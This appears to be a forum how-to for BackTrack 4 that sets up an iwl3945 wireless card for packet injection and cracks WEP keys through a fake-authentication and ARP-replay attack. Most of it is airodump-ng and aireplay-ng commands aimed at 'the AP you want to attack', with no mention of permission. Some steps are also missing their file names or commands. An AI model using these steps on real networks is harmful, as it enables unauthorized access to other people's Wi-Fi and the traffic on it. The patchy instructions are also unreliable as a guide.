HOW TO: iwl3945 BackTrack 4
Right, I spent ages trying to get this to work, following various tutorials and I eventually managed to get it working... Very well in fact, 64 bit wep in <2mins.
The most important part ends after "ifconfig wifi0 up" because at that point your iwl3945 is ready to inject, after that its a fake auth WEP attack, but it should work nonetheless.
1. type iwconfig, it should show you eth0, eth1 and wlan0
2. airodump-ng wlan0 and note down the BSSID(MAC) and channel of the AP you want to attack, then ctrl+c to quit it.
3. Configure your card to use ipwraw:
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
modprobe -r iwl3945
ifconfig wifi0 down
We need to edit a few files, i find nano to be the easiest editor, ctrl+o saves a file, and ctrl+x exits.
Change the below file to the AP BSSID
Change the below file to the AP's Channel
Change the value from 108 to 2
ifconfig wifi0 up
Right, thats your card set for injection! It actually works!
To crack a wep key using the fake auth method:
airodump-ng -w output.cap rtap0
leave it running and in a new window...
aireplay-ng -1 0 -a APMAChere wifi0
it should try and associate with the access point, you are looking for association successful. in a new window...
aireplay-ng -3 -b APMAChere wifi0
it should start injecting the AP, you are looking for the arp count to rise!
in a new window...
Select your network from the list... you are looking for key found! you might need to try again as the IV count goes up (hopefully quickly).
This is how I made it work, if anyone knows a quicker/easier way then go for it, none that I found worked for me. This is a mix of a few!
Hope this saves someone some time of encourages them to give it another go.